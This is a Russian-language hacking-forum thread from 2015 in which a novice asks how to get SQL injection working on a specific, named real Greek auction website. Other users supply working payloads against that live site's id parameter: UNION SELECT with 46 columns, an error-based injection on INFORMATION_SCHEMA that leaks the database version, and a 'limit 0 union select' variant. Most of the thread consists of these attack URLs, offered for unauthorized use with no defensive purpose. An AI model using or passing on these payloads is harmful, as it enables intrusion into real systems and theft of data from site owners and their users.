Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   SQL-инъекция. Не пускает Error 404 - page not found. (https://forum.antichat.xyz/showthread.php?t=428797)

Dondo 10.08.2015 02:24

На одном сайте не могу внедрить SQL-инъекцию, пишу "-" или "." перед значением id=, не пускает ошибка Error 404 - page not found и все. Посоветуйте чего, а то я новичок в этом деле...

Так не пускет:

Код:

http://www.texnitesonline.gr/controller/auction/preview.php?id=-18961' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 -- -

ocheretko 10.08.2015 10:43

Здесь нет sql иньекции

faza02 10.08.2015 10:53

Цитата:

Сообщение от Dondo

На одном сайте не могу внедрить SQL-инъекцию, пишу "-" или "." перед значением id=, не пускает ошибка Error 404 - page not found и все. Посоветуйте чего, а то я новичок в этом деле...
Так не пускет:
Код:

http://www.texnitesonline.gr/controller/auction/preview.php?id=-18961' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 -- -

попробуйте любые другие функции, чтобы сделать условие ложным. and 1=0 union select

div 0 union select

YaBtr 10.08.2015 11:11

Инъекция есть, не пугайтесь редиректов и ошибок.

ocheretko 10.08.2015 11:17

Код:

http://www.texnitesonline.gr/controller/auction/preview.php?id=18961' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1
Извините, за мою невнимательность. Вот раскрученая

Dondo 10.08.2015 15:35

Цитата:

Сообщение от ocheretko

Код:

http://www.texnitesonline.gr/controller/auction/preview.php?id=18961' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1
Извините, за мою невнимательность. Вот раскрученая

Спасибо!

kamaz 13.08.2015 17:30

Ну и если кому-то по эстетическим причинам не нравится error based, то так оно тоже вполне себе работает

Код:

http://www.texnitesonline.gr/controller/auction/preview.php?id=18963' limit 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 -- 1


Время: 08:56